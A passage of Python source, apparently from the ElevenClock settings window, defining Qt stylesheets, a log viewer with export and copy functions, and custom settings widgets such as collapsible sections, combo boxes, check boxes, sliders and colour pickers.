#stChk::indicator:checked:disabled {{
border: {self.getPx(1)}px solid rgba(136, 136, 136, 25%);
background-color: #eeeeee;
color: rgba(136, 136, 136, 25%);
border-radius: {self.getPx(6)}px;
image: url("{getPath("tick_white.png")}");
}}
#stCmbbx {{
width: {self.getPx(100)}px;
background-color: rgba(255, 255, 255, 10%);
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-bottom: {self.getPx(1)}px solid rgba(204, 204, 204, 25%);
}}
#stCmbbx:disabled {{
width: {self.getPx(100)}px;
background-color: #eeeeee;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-top: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
}}
#stCmbbx:hover {{
background-color: rgba(238, 238, 238, 25%);
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-bottom: {self.getPx(1)}px solid rgba(204, 204, 204, 25%);
}}
#stCmbbx::drop-down {{
subcontrol-origin: padding;
subcontrol-position: top right;
padding: {self.getPx(5)}px;
border-radius: {self.getPx(6)}px;
border: none;
width: {self.getPx(30)}px;
}}
#stCmbbx::down-arrow {{
image: url("{getPath(f"down-arrow_{self.iconMode}.png")}");
height: {self.getPx(8)}px;
width: {self.getPx(8)}px;
}}
#stCmbbx::down-arrow:disabled {{
image: url("{getPath(f"down-arrow_{self.iconMode}.png")}");
height: {self.getPx(2)}px;
width: {self.getPx(2)}px;
}}
#stCmbbx QAbstractItemView {{
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
padding: {self.getPx(4)}px;
outline: 0px;
background-color: rgba(255, 255, 255, 10%);
border-radius: {self.getPx(8)}px;
}}
#stCmbbx QAbstractItemView::item{{
height: {self.getPx(30)}px;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
#stCmbbx QAbstractItemView::item:selected{{
background: rgba(0, 0, 0, 6%);
height: {self.getPx(30)}px;
outline: none;
color: black;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QSCrollArea,QVBoxLayout{{
border: none;
margin: none;
padding: none;
outline: none;
}}
QScrollBar:vertical {{
background: rgba(255, 255, 255, 10%);
margin: {self.getPx(4)}px;
width: {self.getPx(20)}px;
border: none;
border-radius: {self.getPx(5)}px;
}}
QScrollBar::handle:vertical {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
min-height: {self.getPx(20)}px;
background: rgba(196, 196, 196, 25%);
}}
QScrollBar::handle:vertical:hover {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
background: rgba(136, 136, 136, 25%);
}}
QScrollBar::add-line:vertical {{
height: 0;
subcontrol-position: bottom;
subcontrol-origin: margin;
}}
QScrollBar::sub-line:vertical {{
height: 0;
subcontrol-position: top;
subcontrol-origin: margin;
}}
QScrollBar::up-arrow:vertical, QScrollBar::down-arrow:vertical {{
background: none;
}}
QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {{
background: none;
}}
#greyishLabel {{
color: #888888;
}}
#dialogButtonWidget{{
background-color: #eeeeee;
}}
""")
def openLogWindow(self):
class QPlainTextEditWithFluentMenu(QPlainTextEdit):
def __init__(self):
super().__init__()
def contextMenuEvent(self, e: QtGui.QContextMenuEvent) -> None:
menu = self.createStandardContextMenu()
menu.addSeparator()
a = QAction()
a.setText(_("Reload log"))
a.triggered.connect(lambda: textEdit.setPlainText(globals.buffer.getvalue()))
menu.addAction(a)
a2 = QAction()
a2.setText(_("Export log as a file"))
a2.triggered.connect(lambda: saveLog())
menu.addAction(a2)
a3 = QAction()
a3.setText(_("Copy log to clipboard"))
a3.triggered.connect(lambda: copyLog())
menu.addAction(a3)
ApplyMenuBlur(menu.winId().__int__(), menu)
menu.exec(e.globalPos())
return super().contextMenuEvent(e)
global old_stdout, buffer
win = QMainWindow(self)
win.resize(self.getPx(900), self.getPx(600))
win.setObjectName("background")
w = QWidget()
w.setLayout(QVBoxLayout())
w.setContentsMargins(0, 0, 0, 0)
textEdit = QPlainTextEditWithFluentMenu()
textEdit.setReadOnly(True)
if isWindowDark():
textEdit.setStyleSheet(f"QPlainTextEdit{{margin: {self.getPx(10)}px;border-radius: {self.getPx(4)}px;border: {self.getPx(1)}px solid #161616;}}")
else:
textEdit.setStyleSheet(f"QPlainTextEdit{{margin: {self.getPx(10)}px;border-radius: {self.getPx(4)}px;border: {self.getPx(1)}px solid #dddddd;}}")
textEdit.setPlainText(globals.buffer.getvalue())
reloadButton = QPushButton(_("Reload log"))
reloadButton.setFixedWidth(self.getPx(200))
reloadButton.clicked.connect(lambda: textEdit.setPlainText(globals.buffer.getvalue()))
def saveLog():
try:
print("🔵 Saving log...")
f = QFileDialog.getSaveFileName(win, "Save log", os.path.expanduser("~"), "Text file (.txt)")
if f[0]:
fpath = f[0]
if not ".txt" in fpath.lower():
fpath += ".txt"
with open(fpath, "wb") as fobj:
fobj.write(globals.buffer.getvalue().encode("utf-8"))
fobj.close()
os.startfile(fpath)
print("🟢 log saved successfully")
textEdit.setPlainText(globals.buffer.getvalue())
else:
print("🟡 log save cancelled!")
textEdit.setPlainText(globals.buffer.getvalue())
except Exception as e:
report(e)
textEdit.setPlainText(globals.buffer.getvalue())
exportButtom = QPushButton(_("Export log as a file"))
exportButtom.setFixedWidth(self.getPx(200))
exportButtom.clicked.connect(lambda: saveLog())
def copyLog():
try:
print("🔵 Copying log to the clipboard...")
globals.app.clipboard().setText(globals.buffer.getvalue())
print("🟢 Log copied to the clipboard successfully!")
textEdit.setPlainText(globals.buffer.getvalue())
except Exception as e:
report(e)
textEdit.setPlainText(globals.buffer.getvalue())
copyButton = QPushButton(_("Copy log to clipboard"))
copyButton.setFixedWidth(self.getPx(200))
copyButton.clicked.connect(lambda: copyLog())
hl = QHBoxLayout()
hl.setSpacing(self.getPx(5))
hl.setContentsMargins(self.getPx(10), self.getPx(10), self.getPx(10), 0)
hl.addWidget(exportButtom)
hl.addWidget(copyButton)
hl.addStretch()
hl.addWidget(reloadButton)
w.layout().setSpacing(0)
w.layout().setContentsMargins(self.getPx(5), self.getPx(5), self.getPx(5), self.getPx(5))
w.layout().addLayout(hl, stretch=0)
w.layout().addWidget(textEdit, stretch=1)
win.setCentralWidget(w)
win.hwnd = win.winId().__int__()
win.setAttribute(Qt.WA_TranslucentBackground)
win.setAttribute(Qt.WA_NoSystemBackground)
win.setAutoFillBackground(True)
win.hwnd = win.winId().__int__()
window_style = win32gui.GetWindowLong(win.hwnd, GWL_STYLE)
win32gui.SetWindowLong(win.hwnd, GWL_STYLE, window_style | WS_POPUP | WS_THICKFRAME | WS_CAPTION | WS_SYSMENU)
if QtWin.isCompositionEnabled():
QtWin.extendFrameIntoClientArea(win, -1, -1, -1, -1)
else:
QtWin.resetExtendedFrame(win)
if ApplyMica(win.hwnd, isWindowDark()) != 0:
if isWindowDark():
GlobalBlur(win.winId().__int__(), Dark=True, Acrylic=True, hexColor="#333333ff")
else:
GlobalBlur(win.winId().__int__(), Dark=False, Acrylic=True, hexColor="#ffffffdd")
win.show()
win.setWindowTitle("")
pixmap = QPixmap(32, 32)
pixmap.fill(Qt.transparent)
win.setWindowIcon(QIcon(pixmap))
def moveEvent(self, event: QMoveEvent) -> None:
if(self.updateSize):
pass
else:
def enableUpdateSize(self: SettingsWindow):
time.sleep(1)
self.updateSize = True
self.updateSize = False
KillableThread(target=enableUpdateSize, args=(self,)).start()
super().moveEvent(event)
def mouseReleaseEvent(self, event) -> None:
if(self.updateSize):
self.settingsWidget.resize(self.width()-self.getPx(17), self.settingsWidget.height())
self.applyStyleSheet()
if not self.isMaximized():
self.scrollArea.setStyleSheet(f"QScrollArea{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;}}")
self.updateSize = False
return super().mouseReleaseEvent(event)
def show(self) -> None:
self.applyStyleSheet()
self.raise_()
self.activateWindow()
return super().show()
def eventFilter(self, watched: QObject, event: QEvent) -> bool:
if event.type() == event.WindowStateChange:
if self.isMaximized():
self.scrollArea.setStyleSheet(f"QScrollArea{{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;}}")
else:
self.scrollArea.setStyleSheet(f"QScrollArea{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;}}")
return super().eventFilter(watched, event)
def closeEvent(self, event: QCloseEvent) -> None:
self.hide()
event.ignore()
def getPx(self, original) -> int:
return round(original*(self.screen().logicalDotsPerInch()/96))
class QSettingsTitle(QWidget):
oldScrollValue = 0
showing = False
searchMode = False
childrenw = []
def __init__(self, text: str, icon: str, descText: str = "No description provided"):
if isWindowDark():
self.iconMode = "white"
semib = "Semib"
else:
self.iconMode = "black"
semib = ""
super().__init__()
self.icon = icon
self.setObjectName("subtitleLabel")
self.label = QLabel("\u200e"+text, self)
self.label.setLayoutDirection(Qt.LayoutDirection.LeftToRight)
self.label.setAlignment(Qt.AlignLeft)
self.setMaximumWidth(self.getPx(1000))
self.descLabel = QLabel(descText, self)
self.descLabel.setLayoutDirection(Qt.LayoutDirection.LeftToRight)
self.descLabel.setObjectName("greyishLabel")
if lang == lang_zh_TW:
self.label.setStyleSheet("font-size: 10pt;background: none;font-family: \"Microsoft JhengHei UI\";")
self.descLabel.setStyleSheet("font-size: 8pt;background: none;font-family: \"Microsoft JhengHei UI\";")
elif lang == lang_zh_CN:
self.label.setStyleSheet("font-size: 10pt;background: none;font-family: \"Microsoft YaHei UI\";")
self.descLabel.setStyleSheet("font-size: 8pt;background: none;font-family: \"Microsoft YaHei UI\";")
else:
self.label.setStyleSheet(f"font-size: 10pt;background: none;font-family: \"Segoe UI Variable Display {semib}\";")
self.descLabel.setStyleSheet(f"font-size: 8pt;background: none;font-family: \"Segoe UI Variable Display {semib}\";")
self.image = QLabel(self)
self.image.setStyleSheet(f"padding: {self.getPx(1)}px;background: none;")
self.setAttribute(Qt.WA_StyledBackground)
self.compressibleWidget = QWidget(self)
self.compressibleWidget.show()
self.compressibleWidget.setAutoFillBackground(True)
self.compressibleWidget.setObjectName("compressibleWidget")
self.compressibleWidget.setStyleSheet("#compressibleWidget{background-color: transparent;}")
self.showHideButton = QPushButton("", self)
self.showHideButton.setIcon(QIcon(getPath(f"expand_{self.iconMode}.png")))
self.showHideButton.setStyleSheet("border: none; background-color:none;")
self.showHideButton.clicked.connect(self.toggleChilds)
l = QVBoxLayout()
l.setSpacing(0)
l.setContentsMargins(0, 0, 0, 0)
self.childsVisible = False
self.compressibleWidget.setLayout(l)
self.setStyleSheet(f"QWidget#subtitleLabel{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: {self.getPx(1)}px;}}")
self.showAnim = QVariantAnimation(self.compressibleWidget)
self.showAnim.setEasingCurve(QEasingCurve.InOutCubic)
self.showAnim.setStartValue(0)
self.showAnim.setEndValue(1000)
self.showAnim.valueChanged.connect(lambda v: self.setChildFixedHeight(v))
self.showAnim.setDuration(300)
self.showAnim.finished.connect(self.invertNotAnimated)
self.hideAnim = QVariantAnimation(self.compressibleWidget)
self.hideAnim.setEndValue(0)
self.hideAnim.setEasingCurve(QEasingCurve.InOutCubic)
self.hideAnim.valueChanged.connect(lambda v: self.setChildFixedHeight(v))
self.hideAnim.setDuration(300)
self.hideAnim.finished.connect(self.invertNotAnimated)
self.scrollAnim = QVariantAnimation(self)
self.scrollAnim.setEasingCurve(QEasingCurve.InOutCubic)
self.scrollAnim.valueChanged.connect(lambda i: self.window().scrollArea.verticalScrollBar().setValue(i))
self.scrollAnim.setDuration(300)
self.NotAnimated = True
self.button = QPushButton("", self)
self.button.setObjectName("subtitleLabelHover")
self.button.clicked.connect(self.toggleChilds)
self.button.setStyleSheet(f"border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;")
self.button.setStyleSheet(f"border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;")
self.setChildFixedHeight(0)
def setChildFixedHeight(self, h: int) -> None:
self.compressibleWidget.setFixedHeight(h)
self.setFixedHeight(h+self.getPx(70))
def invertNotAnimated(self):
self.NotAnimated = not self.NotAnimated
def toggleChilds(self):
if(readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Themes\Personalize", "AppsUseLightTheme", 1)==0):
self.iconMode = "white"
else:
self.iconMode = "black"
if self.childsVisible:
self.childsVisible = False
self.hideAnim.setStartValue(self.compressibleWidget.sizeHint().height())
self.hideAnim.setEndValue(0)
self.invertNotAnimated()
self.scrollAnim.setStartValue(self.window().scrollArea.verticalScrollBar().value())
self.scrollAnim.setEndValue(self.oldScrollValue)
self.scrollAnim.start()
self.showHideButton.setIcon(QIcon(getPath(f"expand_{self.iconMode}.png")))
self.hideAnim.finished.connect(lambda: self.button.setStyleSheet(f"border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;"))
self.hideAnim.start()
else:
self.showHideButton.setIcon(QIcon(getPath(f"collapse_{self.iconMode}.png")))
self.button.setStyleSheet(f"border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;")
self.invertNotAnimated()
self.childsVisible = True
self.oldScrollValue = self.window().scrollArea.verticalScrollBar().value()
self.scrollAnim.setStartValue(self.oldScrollValue)
self.scrollAnim.setEndValue(self.pos().y()-self.getPx(5))
self.scrollAnim.start()
self.showAnim.setStartValue(0)
self.showAnim.setEndValue(self.compressibleWidget.sizeHint().height())
self.showAnim.start()
def window(self) -> 'SettingsWindow':
return super().window()
def getPx(self, original) -> int:
return round(original*(self.screen().logicalDotsPerInchX()/96))
def setIcon(self, icon: str) -> None:
self.image.setPixmap(QIcon(icon).pixmap(QSize(self.getPx(24), self.getPx(24))))
def resizeEvent(self, event: QResizeEvent) -> None:
if not self.searchMode:
self.image.show()
self.showHideButton.show()
self.button.show()
self.image.show()
self.label.show()
self.descLabel.show()
self.image.setPixmap(QIcon(self.icon).pixmap(QSize(self.getPx(24), self.getPx(24))))
self.button.move(0, 0)
self.button.resize(self.width(), self.getPx(70))
self.showHideButton.setIconSize(QSize(self.getPx(12), self.getPx(12)))
self.showHideButton.setFixedSize(self.getPx(30), self.getPx(30))
self.showHideButton.move(self.width()-self.getPx(55), self.getPx(20))
self.label.move(self.getPx(70), self.getPx(17))
self.label.setFixedHeight(self.getPx(20))
self.descLabel.move(self.getPx(70), self.getPx(37))
self.descLabel.setFixedHeight(self.getPx(20))
self.descLabel.setFixedWidth(self.width()-self.getPx(70)-self.getPx(70))
self.image.move(self.getPx(27), self.getPx(20))
self.image.setFixedHeight(self.getPx(30))
if self.childsVisible and self.NotAnimated:
self.setFixedHeight(self.compressibleWidget.sizeHint().height()+self.getPx(70))
self.compressibleWidget.setFixedHeight(self.compressibleWidget.sizeHint().height())
elif self.NotAnimated:
self.setFixedHeight(self.getPx(70))
self.compressibleWidget.move(0, self.getPx(70))
self.compressibleWidget.setFixedWidth(self.width())
self.image.setFixedHeight(self.getPx(30))
self.label.setFixedWidth(self.width()-self.getPx(140))
self.image.setFixedWidth(self.getPx(30))
else:
self.image.hide()
self.showHideButton.hide()
self.button.hide()
self.image.hide()
self.label.hide()
self.descLabel.hide()
self.setFixedHeight(self.compressibleWidget.sizeHint().height())
self.compressibleWidget.setFixedHeight(self.compressibleWidget.sizeHint().height())
self.compressibleWidget.move(0, 0)
self.compressibleWidget.setFixedWidth(self.width())
return super().resizeEvent(event)
def addWidget(self, widget: QWidget) -> None:
self.compressibleWidget.layout().addWidget(widget)
self.childrenw.append(widget)
def getChildren(self) -> list:
return self.childrenw
class QSettingsButton(QWidget):
clicked = Signal()
def __init__(self, text="", btntext="", parent=None, h = 30):
super().__init__(parent)
self.fh = h
self.setAttribute(Qt.WA_StyledBackground)
self.button = QPushButton(btntext+" ", self)
self.button.setLayoutDirection(Qt.RightToLeft)
self.setObjectName("stBtn")
self.label = QLabel("\u200e"+text, self)
if lang == lang_zh_TW:
self.label.setStyleSheet("font-size: 10pt;background: none;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.button.setStyleSheet("font-size: 10pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
elif lang == lang_zh_CN:
self.label.setStyleSheet("font-size: 10pt;background: none;font-family: \"Microsoft YaHei UI\";font-weight: 450;")
self.button.setStyleSheet("font-size: 10pt;font-family: \"Microsoft YaHei UI\";font-weight: 450;")
else:
self.label.setStyleSheet("font-size: 9pt;background: none;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.button.setStyleSheet("font-size: 9pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.label.setObjectName("StLbl")
self.button.clicked.connect(self.clicked.emit)
def getPx(self, original) -> int:
return round(original*(self.screen().logicalDotsPerInchX()/96))
def resizeEvent(self, event: QResizeEvent) -> None:
self.button.move(self.width()-self.getPx(170), self.getPx(10))
self.label.move(self.getPx(70), self.getPx(10))
self.label.setFixedWidth(self.width()-self.getPx(250))
self.label.setFixedHeight(self.getPx(self.fh))
self.setFixedHeight(self.getPx(50+(self.fh-30)))
self.button.setFixedHeight(self.getPx(self.fh))
self.button.setFixedWidth(self.getPx(150))
return super().resizeEvent(event)
def setIcon(self, icon: QIcon) -> None:
self.button.setIcon(icon)
def text(self) -> str:
return self.label.text() + " " + self.button.text()
class QSettingsComboBox(QWidget):
textChanged = Signal(str)
def __init__(self, text="", btntext="", parent=None):
super().__init__(parent)
class QComboBoxWithFluentMenu(QComboBox):
def __init__(self, parent) -> None:
super().__init__(parent)
v = self.view().window()
ApplyMenuBlur(v.winId().__int__(), v)
self.setAttribute(Qt.WA_StyledBackground)
self.combobox = QComboBoxWithFluentMenu(self)
self.combobox.setObjectName("stCmbbx")
self.combobox.setItemDelegate(QStyledItemDelegate(self.combobox))
self.setObjectName("stBtn")
self.restartButton = QPushButton("Restart ElevenClock", self)
self.restartButton.hide()
self.restartButton.setObjectName("AccentButton")
self.label = QLabel("\u200e"+text, self)
if lang == lang_zh_TW:
self.label.setStyleSheet("font-size: 11pt;background: none;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.combobox.setStyleSheet("font-size: 11pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.restartButton.setStyleSheet("font-size: 11pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
elif lang == lang_zh_CN:
self.label.setStyleSheet("font-size: 11pt;background: none;font-family: \"Microsoft YaHei UI\";font-weight: 450;")
self.combobox.setStyleSheet("font-size: 11pt;font-family: \"Microsoft YaHei UI\";font-weight: 450;")
self.restartButton.setStyleSheet("font-size: 11pt;font-family: \"Microsoft YaHei UI\";font-weight: 450;")
else:
self.label.setStyleSheet("font-size: 9pt;background: none;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.combobox.setStyleSheet("font-size: 9pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.restartButton.setStyleSheet("font-size: 9pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.label.setObjectName("StLbl")
def getPx(self, original) -> int:
return round(original*(self.screen().logicalDotsPerInchX()/96))
def setItems(self, items: list, index: int) -> None:
self.combobox.addItems(items)
try:
self.combobox.setCurrentIndex(index)
except Exception as e:
report(e)
self.combobox.setCurrentIndex(0)
self.combobox.currentTextChanged.connect(self.textChanged.emit)
def resizeEvent(self, event: QResizeEvent) -> None:
self.combobox.move(self.width()-self.getPx(270), self.getPx(10))
self.label.move(self.getPx(70), self.getPx(10))
self.label.setFixedWidth(self.width()-self.getPx(480))
self.label.setFixedHeight(self.getPx(30))
self.restartButton.move(self.width()-self.getPx(430), self.getPx(10))
self.restartButton.setFixedWidth(self.getPx(150))
self.restartButton.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(50))
self.combobox.setFixedHeight(self.getPx(30))
self.combobox.setFixedWidth(self.getPx(250))
return super().resizeEvent(event)
def setIcon(self, icon: QIcon) -> None:
pass
#self.button.setIcon(icon)
def showRestartButton(self) -> None:
self.restartButton.show()
def text(self) -> str:
return self.label.text() + " " + self.combobox.currentText()
class QSettingsCheckBox(QWidget):
stateChanged = Signal(bool)
def __init__(self, text="", parent=None):
super().__init__(parent)
self.setAttribute(Qt.WA_StyledBackground)
self.setObjectName("stChkBg")
self.checkbox = QCheckBox(text, self)
if lang == lang_zh_TW:
self.checkbox.setStyleSheet("font-size: 11pt;background: none;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
elif lang == lang_zh_CN:
self.checkbox.setStyleSheet("font-size: 11pt;background: none;font-family: \"Microsoft YaHei UI\";font-weight: 450;")
else:
self.checkbox.setStyleSheet("font-size: 9pt;background: none;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.checkbox.setObjectName("stChk")
self.checkbox.stateChanged.connect(self.stateChanged.emit)
def setChecked(self, checked: bool) -> None:
self.checkbox.setChecked(checked)
def isChecked(self) -> bool:
return self.checkbox.isChecked()
def getPx(self, original) -> int:
return round(original*(self.screen().logicalDotsPerInchX()/96))
def resizeEvent(self, event: QResizeEvent) -> None:
self.checkbox.move(self.getPx(70), self.getPx(10))
self.checkbox.setFixedHeight(self.getPx(30))
self.checkbox.setFixedWidth(self.width()-self.getPx(70))
self.setFixedHeight(self.getPx(50))
return super().resizeEvent(event)
def text(self) -> str:
return self.checkbox.text()
class QSettingsCheckBoxWithWarning(QSettingsCheckBox):
def __init__(self, text = "", infotext = "", parent=None):
super().__init__(text=text, parent=parent)
self.infolabel = QLabel(infotext, self)
self.infolabel.setTextFormat(Qt.RichText)
self.infolabel.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.infolabel.setTextInteractionFlags(Qt.TextBrowserInteraction)
self.infolabel.setOpenExternalLinks(True)
self.infolabel.setObjectName("warningLabel")
self.infolabel.setVisible(self.checkbox.isChecked())
self.checkbox.stateChanged.connect(self.stateChangedFun)
def stateChangedFun(self, checked: bool) -> bool:
self.infolabel.setVisible(checked)
self.stateChanged.emit(checked)
def resizeEvent(self, event: QResizeEvent) -> None:
self.checkbox.move(self.getPx(70), self.getPx(10))
self.checkbox.setFixedHeight(self.getPx(30))
self.checkbox.setFixedWidth(self.width()-self.getPx(70))
self.infolabel.move(self.getPx(150), self.getPx(10))
self.infolabel.setFixedHeight(self.getPx(30))
self.infolabel.setFixedWidth(self.width()-self.getPx(70)-self.getPx(150))
self.setFixedHeight(self.getPx(50))
return super().resizeEvent(event)
class QSettingsSizeBoxComboBox(QSettingsCheckBox):
stateChanged = Signal(bool)
valueChanged = Signal(str)
def __init__(self, text: str, parent=None):
class QComboBoxWithFluentMenu(QComboBox):
def __init__(self, parent) -> None:
super().__init__(parent)
v = self.view().window()
ApplyMenuBlur(v.winId().__int__(), v)
super().__init__(text=text, parent=parent)
self.setAttribute(Qt.WA_StyledBackground)
self.combobox = QComboBoxWithFluentMenu(self)
self.combobox.setObjectName("stCmbbx")
self.combobox.currentIndexChanged.connect(self.valuechangedEvent)
self.checkbox.stateChanged.connect(self.stateChangedEvent)
self.stateChangedEvent(self.checkbox.isChecked())
def resizeEvent(self, event: QResizeEvent) -> None:
self.combobox.move(self.width()-self.getPx(270), self.getPx(10))
self.checkbox.move(self.getPx(70), self.getPx(10))
self.checkbox.setFixedWidth(self.width()-self.getPx(280))
self.checkbox.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(50))
self.combobox.setFixedHeight(self.getPx(30))
self.combobox.setFixedWidth(self.getPx(250))
return super().resizeEvent(event)
def valuechangedEvent(self, i: int):
self.valueChanged.emit(self.combobox.itemText(i))
def stateChangedEvent(self, v: bool):
self.combobox.setEnabled(self.checkbox.isChecked())
if not self.checkbox.isChecked():
self.combobox.setEnabled(False)
self.combobox.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_(self.checkbox.text())))
else:
self.combobox.setEnabled(True)
self.combobox.setToolTip("")
self.valueChanged.emit(self.combobox.currentText())
self.stateChanged.emit(v)
def loadItems(self):
self.combobox.clear()
self.combobox.addItems(str(item) for item in [5, 6, 7, 7.5, 8, 8.5, 9, 9.5, 10, 10.5, 11, 11.5, 12, 13, 14, 16])
class QSettingsSliderWithCheckBox(QSettingsCheckBox):
stateChanged = Signal(bool)
valueChanged = Signal(int)
def __init__(self, text: str, parent=None, min: int = 10, max: int = 100):
super().__init__(text=text, parent=parent)
self.setAttribute(Qt.WA_StyledBackground)
self.slider = QSlider(self)
self.slider.setRange(min, max)
self.slider.setOrientation(Qt.Horizontal)
self.slider.setObjectName("slider")
self.slider.sliderReleased.connect(self.valuechangedEvent)
self.checkbox.stateChanged.connect(self.stateChangedEvent)
self.stateChangedEvent(self.checkbox.isChecked())
def resizeEvent(self, event: QResizeEvent) -> None:
self.slider.move(self.width()-self.getPx(270), self.getPx(10))
self.checkbox.move(self.getPx(70), self.getPx(10))
self.checkbox.setFixedWidth(self.width()-self.getPx(280))
self.checkbox.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(50))
self.slider.setFixedHeight(self.getPx(30))
self.slider.setFixedWidth(self.getPx(250))
return super().resizeEvent(event)
def valuechangedEvent(self):
self.valueChanged.emit(self.slider.value())
def stateChangedEvent(self, v: bool):
self.slider.setEnabled(self.checkbox.isChecked())
if not self.checkbox.isChecked():
self.slider.setEnabled(False)
self.slider.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_(self.checkbox.text())))
else:
self.slider.setEnabled(True)
self.slider.setToolTip("")
self.valueChanged.emit(self.slider.value())
self.stateChanged.emit(v)
class QCustomColorDialog(QColorDialog):
def __init__(self, parent = ...) -> None:
super().__init__(parent=parent)
self.setWindowModality(Qt.WindowModality.WindowModal)
self.setStyleSheet(f"*{{border-radius: {self.getPx(4)}px;}} QColorLuminancePicker {{background-color: transparent; border: {self.getPx(4)}px solid black;margin: none; border: none; padding: none;}} ")
self.setAttribute(Qt.WA_TranslucentBackground)
self.setAutoFillBackground(True)
self.setWindowTitle("")
pixmap = QPixmap(32, 32)
pixmap.fill(Qt.transparent)
self.setWindowIcon(QIcon(pixmap))
self.hwnd = self.winId().__int__()
window_style = win32gui.GetWindowLong(self.hwnd, GWL_STYLE)
win32gui.SetWindowLong(self.hwnd, GWL_STYLE, window_style | WS_POPUP | WS_THICKFRAME | WS_CAPTION | WS_SYSMENU)
if QtWin.isCompositionEnabled():
QtWin.extendFrameIntoClientArea(self, -1, -1, -1, -1)
else:
QtWin.resetExtendedFrame(self)
if ApplyMica(self.hwnd, isWindowDark()) != 0x0:
if isWindowDark():
GlobalBlur(self.winId().__int__(), Dark=True, Acrylic=True, hexColor="#333333ff")
else:
GlobalBlur(self.winId().__int__(), Dark=False, Acrylic=True, hexColor="#ffffffdd")
self.setWindowIcon(self.window().windowIcon())
def getPx(self, i: int):
return round(i*(self.screen().logicalDotsPerInch()/96))
class QSettingsSizeBoxColorDialog(QSettingsCheckBox):
stateChanged = Signal(bool)
valueChanged = Signal(str)
def __init__(self, text: str, parent=None):
super().__init__(text=text, parent=parent)
self.setAttribute(Qt.WA_StyledBackground)
self.colorDialog = QCustomColorDialog(self)
self.colorDialog.setOptions(QColorDialog.DontUseNativeDialog)
self.button = QPushButton(self)
self.button.setObjectName("stCmbbx")
self.button.setText(_("Select custom color"))
self.button.clicked.connect(self.colorDialog.show)
self.colorDialog.colorSelected.connect(self.valuechangedEvent)
self.checkbox.stateChanged.connect(self.stateChangedEvent)
self.stateChangedEvent(self.checkbox.isChecked())
def resizeEvent(self, event: QResizeEvent) -> None:
self.button.move(self.width()-self.getPx(270), self.getPx(10))
self.checkbox.move(self.getPx(70), self.getPx(10))
self.checkbox.setFixedWidth(self.width()-self.getPx(280))
self.checkbox.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(50))
self.button.setFixedHeight(self.getPx(30))
self.button.setFixedWidth(self.getPx(250))
return super().resizeEvent(event)
def valuechangedEvent(self, c: QColor):
r = c.red()
g = c.green()
b = c.blue()
color = f"{r},{g},{b}"
self.valueChanged.emit(color)
self.button.setStyleSheet(f"color: rgb({color})")
def stateChangedEvent(self, v: bool):
self.button.setEnabled(self.checkbox.isChecked())
if not self.checkbox.isChecked():
self.button.setEnabled(False)
self.button.setStyleSheet("")
self.button.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_(self.checkbox.text())))
else:
self.button.setEnabled(True)
self.button.setToolTip("")
self.stateChanged.emit(v)
class QSettingsBgBoxColorDialog(QSettingsSizeBoxColorDialog):
def valuechangedEvent(self, c: QColor):
r = c.red()
g = c.green()
b = c.blue()
a = c.alpha()
color = f"{r},{g},{b},{a/255*100}"
self.valueChanged.emit(color)
self.button.setStyleSheet(f"background-color: rgba({color})")
class QSettingsFontBoxComboBox(QSettingsCheckBox):
stateChanged = Signal(bool)
valueChanged = Signal(str)
def __init__(self, text: str, parent=None):
super().__init__(text=text, parent=parent)
self.setAttribute(Qt.WA_StyledBackground)
class QFontComboBoxWithFluentMenu(QFontComboBox):
def __init__(self, parent) -> None:
super().__init__(parent)
v = self.view().window()
ApplyMenuBlur(v.winId().__int__(), v)
self.combobox = QFontComboBoxWithFluentMenu(self)
self.combobox.setObjectName("stCmbbx")
self.combobox.currentIndexChanged.connect(self.valuechangedEvent)
self.checkbox.stateChanged.connect(self.stateChangedEvent)
self.stateChangedEvent(self.checkbox.isChecked())
def resizeEvent(self, event: QResizeEvent) -> None:
self.combobox.move(self.width()-self.getPx(270), self.getPx(10))
self.checkbox.move(self.getPx(70), self.getPx(10))
